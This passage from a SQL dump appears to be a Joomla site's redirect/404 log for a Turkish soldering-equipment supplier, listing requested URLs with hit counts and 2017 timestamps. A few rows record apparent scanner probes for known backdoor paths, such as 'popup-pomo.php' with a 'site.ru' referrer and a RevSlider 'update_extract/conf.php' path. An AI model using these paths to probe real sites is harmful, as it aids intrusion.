00:00:00',301),(15318,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-12-03 22:21:08','0000-00-00 00:00:00',301),(15319,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-03 22:29:14','0000-00-00 00:00:00',301),(15320,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,mf_name/results,1-50',NULL,'','',1,0,'2017-12-03 22:34:21','0000-00-00 00:00:00',301),(15321,'http://3s-technologies.com.tr/tr/term/popup-pomo.php',NULL,'http://site.ru','',7,0,'2017-12-03 22:42:07','0000-00-00 00:00:00',301),(15322,'http://3s-technologies.com.tr/index.php/en/products/gf-12-hc-ht-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-03 22:48:27','0000-00-00 00:00:00',301),(15323,'http://3s-technologies.com.tr/index.php/tr/ueruenler/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-12-03 23:02:51','0000-00-00 00:00:00',301),(15324,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,category_name',NULL,'','',8,0,'2017-12-03 23:07:58','0000-00-00 00:00:00',301),(15325,'http://3s-technologies.com.tr/en/products/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',228,0,'2017-12-03 23:21:13','0000-00-00 00:00:00',301),(15326,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,mf_name/results,1-10',NULL,'','',1,0,'2017-12-03 23:22:59','0000-00-00 00:00:00',301),(15327,'http://www.3s-technologies.com.tr/tr/urunler/rh2-detail?tmpl=component&print=1',NULL,'','',40,0,'2017-12-03 23:31:54','0000-00-00 00:00:00',301),(15328,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-03 23:45:31','0000-00-00 00:00:00',301),(15329,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-12-03 23:52:08','0000-00-00 00:00:00',301),(15330,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',12,0,'2017-12-04 00:01:15','0000-00-00 00:00:00',301),(15331,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,product_name?language=en-gb',NULL,'','',23,0,'2017-12-04 00:28:11','0000-00-00 00:00:00',301),(15332,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-12-04 00:40:27','0000-00-00 00:00:00',301),(15333,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,product_sku?language=tr-tr',NULL,'','',24,0,'2017-12-04 00:52:05','0000-00-00 00:00:00',301),(15334,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',201,0,'2017-12-04 01:00:17','0000-00-00 00:00:00',301),(15335,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/cm-602-l-detail',NULL,'','',53,0,'2017-12-04 01:02:36','0000-00-00 00:00:00',301),(15336,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2017-12-04 01:06:24','0000-00-00 00:00:00',301),(15337,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',23,0,'2017-12-04 01:21:30','0000-00-00 00:00:00',301),(15338,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-12-04 01:37:14','0000-00-00 00:00:00',301),(15339,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name?language=en-gb',NULL,'','',26,0,'2017-12-04 01:38:51','0000-00-00 00:00:00',301),(15340,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-42-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-04 01:57:24','0000-00-00 00:00:00',301),(15341,'http://3s-technologies.com.tr/en/products/asp-300-detail?tmpl=component&print=1',NULL,'','',11,0,'2017-12-04 02:16:45','0000-00-00 00:00:00',301),(15342,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,ordering?language=tr-tr',NULL,'','',24,0,'2017-12-04 03:12:29','0000-00-00 00:00:00',301),(15343,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku?error=404&language=en-gb',NULL,'','',1,0,'2017-12-04 03:15:09','0000-00-00 00:00:00',301),(15344,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-04 03:53:02','0000-00-00 00:00:00',301),(15345,'http://3s-technologies.com.tr/tr/options/popup-pomo.php',NULL,'http://site.ru','',9,0,'2017-12-04 03:54:07','0000-00-00 00:00:00',301),(15346,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,category_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-12-04 03:59:26','0000-00-00 00:00:00',301),(15347,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,product_sku/results,1-5',NULL,'','',12,0,'2017-12-04 04:16:12','0000-00-00 00:00:00',301),(15348,'http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez5/home-page-beez5/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',7,0,'2017-12-04 04:20:12','0000-00-00 00:00:00',301),(15349,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-12-04 04:24:16','0000-00-00 00:00:00',301),(15350,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/kester',NULL,'','',21,0,'2017-12-04 04:38:39','0000-00-00 00:00:00',301),(15351,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',177,0,'2017-12-04 04:53:27','0000-00-00 00:00:00',301),(15352,'http://3s-technologies.com.tr/tr/postnew/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-04 04:55:12','0000-00-00 00:00:00',301),(15353,'http://www.3s-technologies.com.tr/tr/urunler/bã¶lgesel-lehimleme',NULL,'','',1,0,'2017-12-04 05:10:59','0000-00-00 00:00:00',301),(15354,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-12-04 05:15:27','0000-00-00 00:00:00',301),(15355,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',14,0,'2017-12-04 05:22:06','0000-00-00 00:00:00',301),(15356,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',174,0,'2017-12-04 06:32:45','0000-00-00 00:00:00',301),(15357,'http://3s-technologies.com.tr/index.php/en/products/smd-orta',NULL,'','',1,0,'2017-12-04 07:38:13','0000-00-00 00:00:00',301),(15358,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/dirdesc/results,1-40',NULL,'','',3,0,'2017-12-04 07:59:39','0000-00-00 00:00:00',301),(15359,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/manufacturer/resized/mirae_logo_250x250.gif',NULL,'','',3,0,'2017-12-04 08:07:39','0000-00-00 00:00:00',301),(15360,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc',NULL,'','',10,0,'2017-12-04 08:24:28','0000-00-00 00:00:00',301),(15361,'http://www.3s-technologies.com.tr/en/wp-content/plugins/revslider/temp/update_extract/conf.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/revslider/temp/update_extract/conf.php','',3,0,'2017-12-04 08:56:33','0000-00-00 00:00:00',301),(15362,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/dirdesc/results,1-10',NULL,'','',5,0,'2017-12-04 09:14:08','0000-00-00 00:00:00',301),(15363,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/dirdesc/results,1-10',NULL,'','',10,0,'2017-12-04 09:26:32','0000-00-00 00:00:00',301),(15364,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by?language=en-gb&product_sku',NULL,'','',2,0,'2017-12-04 10:14:21','0000-00-00 00:00:00',301),(15365,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-04 10:16:37','0000-00-00 00:00:00',301),(15366,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2017-12-04 10:31:58','0000-00-00 00:00:00',301),(15367,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-12-04 12:27:06','0000-00-00 00:00:00',301),(15368,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',1,0,'2017-12-04 12:40:20','0000-00-00 00:00:00',301),(15369,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/results,1-20',NULL,'','',7,0,'2017-12-04 13:03:34','0000-00-00 00:00:00',301),(15370,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/dirdesc/results,1-100',NULL,'','',2,0,'2017-12-04 13:26:47','0000-00-00 00:00:00',301),(15371,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_sku/results,1-5',NULL,'','',1,0,'2017-12-04 13:38:24','0000-00-00 00:00:00',301),(15372,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,ordering?language=en-gb',NULL,'','',1,0,'2017-12-04 14:14:31','0000-00-00 00:00:00',301),(15373,'http://3s-technologies.com.tr/tr/profile/popup-pomo.php',NULL,'http://site.ru','',5,0,'2017-12-04 14:15:52','0000-00-00 00:00:00',301),(15374,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/cs40-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-12-04 15:05:12','0000-00-00 00:00:00',301),(15375,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-12-04 15:10:49','0000-00-00 00:00:00',301),(15376,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_sku/results,1-10',NULL,'','',6,0,'2017-12-04 15:22:55','0000-00-00 00:00:00',301),(15377,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',191,0,'2017-12-04 15:34:32','0000-00-00 00:00:00',301),(15378,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-04 15:37:39','0000-00-00 00:00:00',301),(15379,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-12-04 15:41:28','0000-00-00 00:00:00',301),(15380,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_sku/results,1-50',NULL,'','',1,0,'2017-12-04 16:44:12','0000-00-00 00:00:00',301),(15381,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',8,0,'2017-12-04 17:12:32','0000-00-00 00:00:00',301),(15382,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,ordering?language=tr-tr',NULL,'','',23,0,'2017-12-04 17:23:10','0000-00-00 00:00:00',301),(15383,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',211,0,'2017-12-04 18:56:35','0000-00-00 00:00:00',301),(15384,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_sku/results,1-20',NULL,'','',1,0,'2017-12-04 19:15:10','0000-00-00 00:00:00',301),(15385,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,ordering?language=tr-tr',NULL,'','',7,0,'2017-12-04 19:25:30','0000-00-00 00:00:00',301),(15386,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',340,0,'2017-12-04 19:30:17','0000-00-00 00:00:00',301),(15387,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',338,0,'2017-12-04 19:30:27','0000-00-00 00:00:00',301),(15388,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',339,0,'2017-12-04 19:30:29','0000-00-00 00:00:00',301),(15389,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',340,0,'2017-12-04 19:30:34','0000-00-00 00:00:00',301),(15390,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',330,0,'2017-12-04 19:30:37','0000-00-00 00:00:00',301),(15391,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı',NULL,'','',332,0,'2017-12-04 19:30:41','0000-00-00 00:00:00',301),(15392,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',329,0,'2017-12-04 19:30:43','0000-00-00 00:00:00',301),(15393,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',333,0,'2017-12-04 19:30:45','0000-00-00 00:00:00',301),(15394,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',350,0,'2017-12-04 19:31:27','0000-00-00 00:00:00',301),(15395,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',347,0,'2017-12-04 19:31:29','0000-00-00 00:00:00',301),(15396,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2017-12-04 19:50:00','0000-00-00 00:00:00',301),(15397,'http://3s-technologies.com.tr/index.php/en/products/flux/955lc-37-detail',NULL,'','',19,0,'2017-12-04 20:24:54','0000-00-00 00:00:00',301),(15398,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-12-04 20:39:09','0000-00-00 00:00:00',301),(15399,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name',NULL,'','',1,0,'2017-12-04 20:47:16','0000-00-00 00:00:00',301),(15400,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,`p`.product_sku/results,1-10',NULL,'','',5,0,'2017-12-04 20:59:40','0000-00-00 00:00:00',301),(15401,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-04 21:16:07','0000-00-00 00:00:00',301),(15402,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name?language=en-gb',NULL,'','',1,0,'2017-12-04 21:41:30','0000-00-00 00:00:00',301),(15403,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/3s-technologies.com.tr/joomla/tr/parks-home',NULL,'','',3,0,'2017-12-04 22:35:37','0000-00-00 00:00:00',301),(15404,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,mf_name/results,1-50',NULL,'','',1,0,'2017-12-04 22:58:57','0000-00-00 00:00:00',301),(15405,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',200,0,'2017-12-04 23:21:27','0000-00-00 00:00:00',301),(15406,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/results,1-5',NULL,'','',1,0,'2017-12-05 00:13:12','0000-00-00 00:00:00',301),(15407,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/results,1-5',NULL,'','',1,0,'2017-12-05 00:17:59','0000-00-00 00:00:00',301),(15408,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-12-05 00:26:54','0000-00-00 00:00:00',301),(15409,'http://3s-technologies.com.tr/index.php/en/products/sp-18p-l-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-05 00:40:14','0000-00-00 00:00:00',301),(15410,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-12-05 01:23:59','0000-00-00 00:00:00',301),(15411,'http://3s-technologies.com.tr/en/products/thru-hole/jv131-detail',NULL,'','',18,0,'2017-12-05 01:33:12','0000-00-00 00:00:00',301),(15412,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,ordering?language=en-gb',NULL,'','',1,0,'2017-12-05 01:33:34','0000-00-00 00:00:00',301),(15413,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',50,0,'2017-12-05 01:43:35','0000-00-00 00:00:00',301),(15414,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-12-05 01:51:55','0000-00-00 00:00:00',301),(15415,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/results,1-50',NULL,'','',1,0,'2017-12-05 01:55:46','0000-00-00 00:00:00',301),(15416,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/mi-300-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-12-05 03:19:40','0000-00-00 00:00:00',301),(15417,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,category_name?language=tr-tr',NULL,'','',13,0,'2017-12-05 03:47:41','0000-00-00 00:00:00',301),(15418,'https://www.3s-technologies.com.tr/en/products/rh2-20-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-05 03:55:14','0000-00-00 00:00:00',301),(15419,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/results,1-10',NULL,'','',1,0,'2017-12-05 04:00:38','0000-00-00 00:00:00',301),(15420,'http://www.3s-technologies.com.tr/en/products/smd-orta-hä±zlä±/by,product_name',NULL,'','',1,0,'2017-12-05 04:05:52','0000-00-00 00:00:00',301),(15421,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim?language=tr-tr',NULL,'','',13,0,'2017-12-05 04:08:16','0000-00-00 00:00:00',301),(15422,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering?language=en-gb',NULL,'','',1,0,'2017-12-05 04:31:46','0000-00-00 00:00:00',301),(15423,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-12-05 04:41:14','0000-00-00 00:00:00',301),(15424,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,product_name?language=tr-tr',NULL,'','',13,0,'2017-12-05 05:01:25','0000-00-00 00:00:00',301),(15425,'http://3s-technologies.com.tr/tr/urunler/thru-hole/dirdesc/results,1-20',NULL,'','',9,0,'2017-12-05 05:14:06','0000-00-00 00:00:00',301),(15426,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole/rl132-detail',NULL,'','',1,0,'2017-12-05 05:29:25','0000-00-00 00:00:00',301),(15427,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?language=en-gb&ordering',NULL,'','',1,0,'2017-12-05 05:36:32','0000-00-00 00:00:00',301),(15428,'https://www.3s-technologies.com.tr/tr/urunler/smd-fırın/ly-8c-detail',NULL,'','',1,0,'2017-12-05 05:38:19','0000-00-00 00:00:00',301),(15429,'https://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',1,0,'2017-12-05 05:39:31','0000-00-00 00:00:00',301),(15430,'https://www.3s-technologies.com.tr/en/products/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-05 05:43:14','0000-00-00 00:00:00',301),(15431,'http://www.3s-technologies.com.tr/index.php/en/products/rh2-20-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-05 05:47:27','0000-00-00 00:00:00',301),(15432,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',2,0,'2017-12-05 05:54:14','0000-00-00 00:00:00',301),(15433,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo',NULL,'','',35,0,'2017-12-05 06:08:40','0000-00-00 00:00:00',301),(15434,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/results,1-20',NULL,'','',1,0,'2017-12-05 06:12:52','0000-00-00 00:00:00',301),(15435,'http://www.3s-technologies.com.tr/index.php/en/products/npm-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-12-05 06:42:07','0000-00-00 00:00:00',301),(15436,'http://www.3s-technologies.com.tr/index.php/en/products/rh6-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-05 06:47:03','0000-00-00 00:00:00',301),(15437,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-05 06:58:27','0000-00-00 00:00:00',301),(15438,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_sku/results,1-5',NULL,'','',5,0,'2017-12-05 07:11:38','0000-00-00 00:00:00',301),(15439,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hä±z/cm-602-l-detail',NULL,'','',1,0,'2017-12-05 07:26:15','0000-00-00 00:00:00',301),(15440,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-05 07:34:49','0000-00-00 00:00:00',301),(15441,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-detail/askquestion?tmpl=component',NULL,'','',23,0,'2017-12-05 07:37:38','0000-00-00 00:00:00',301),(15442,'https://www.3s-technologies.com.tr/tr/urunler/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-05 07:44:36','0000-00-00 00:00:00',301),(15443,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-12-05 08:10:09','0000-00-00 00:00:00',301),(15444,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-12-05 08:21:48','0000-00-00 00:00:00',301),(15445,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,product_name?language=tr-tr',NULL,'','',6,0,'2017-12-05 08:26:32','0000-00-00 00:00:00',301),(15446,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-12-05 08:53:16','0000-00-00 00:00:00',301),(15447,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',52,0,'2017-12-05 09:01:30','0000-00-00 00:00:00',301),(15448,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,product_name?language=tr-tr',NULL,'','',23,0,'2017-12-05 09:06:07','0000-00-00 00:00:00',301),(15449,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,mf_name/results,1-10',NULL,'','',12,0,'2017-12-05 09:16:32','0000-00-00 00:00:00',301),(15450,'http://www.3s-technologies.com.tr/en/wp-content/themes/rockstar-theme/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/rockstar-theme/style.css','',3,0,'2017-12-05 09:50:23','0000-00-00 00:00:00',301),(15451,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_name/results,1-5',NULL,'','',2,0,'2017-12-05 10:00:37','0000-00-00 00:00:00',301),(15452,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-detail/askquestion?tmpl=component',NULL,'','',6,0,'2017-12-05 10:09:14','0000-00-00 00:00:00',301),(15453,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-12-05 11:31:29','0000-00-00 00:00:00',301),(15454,'http://www.3s-technologies.com.tr/tr/license.php',NULL,'','',27,0,'2017-12-05 11:34:34','0000-00-00 00:00:00',301),(15455,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-10',NULL,'','',9,0,'2017-12-05 12:19:40','0000-00-00 00:00:00',301),(15456,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name?language=en-gb',NULL,'','',1,0,'2017-12-05 12:46:56','0000-00-00 00:00:00',301),(15457,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,mf_name?language=tr-tr',NULL,'','',30,0,'2017-12-05 12:48:34','0000-00-00 00:00:00',301),(15458,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-12-05 13:07:51','0000-00-00 00:00:00',301),(15459,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',2,0,'2017-12-05 13:25:49','0000-00-00 00:00:00',301),(15460,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,ordering?language=tr-tr',NULL,'','',24,0,'2017-12-05 13:55:34','0000-00-00 00:00:00',301),(15461,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-detail/askquestion?tmpl=component',NULL,'','',6,0,'2017-12-05 14:12:29','0000-00-00 00:00:00',301),(15462,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,category_name?language=en-gb',NULL,'','',1,0,'2017-12-05 14:27:14','0000-00-00 00:00:00',301),(15463,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-05 15:07:38','0000-00-00 00:00:00',301),(15464,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,mf_name/dirdesc',NULL,'','',17,0,'2017-12-05 15:15:16','0000-00-00 00:00:00',301),(15465,'http://3s-technologies.com.tr/en/products/rl132-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-12-05 15:27:51','0000-00-00 00:00:00',301),(15466,'http://3s-technologies.com.tr/index.php/en/products/ess-310-24-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-05 17:05:22','0000-00-00 00:00:00',301),(15467,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/275-k100-1mm-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-12-05 17:25:24','0000-00-00 00:00:00',301),(15468,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/dirdesc/results,1-100',NULL,'','',2,0,'2017-12-05 18:28:26','0000-00-00 00:00:00',301),(15469,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',197,0,'2017-12-05 19:28:33','0000-00-00 00:00:00',301),(15470,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-12-05 19:36:52','0000-00-00 00:00:00',301),(15471,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name?language=en-gb',NULL,'','',3,0,'2017-12-05 19:58:02','0000-00-00 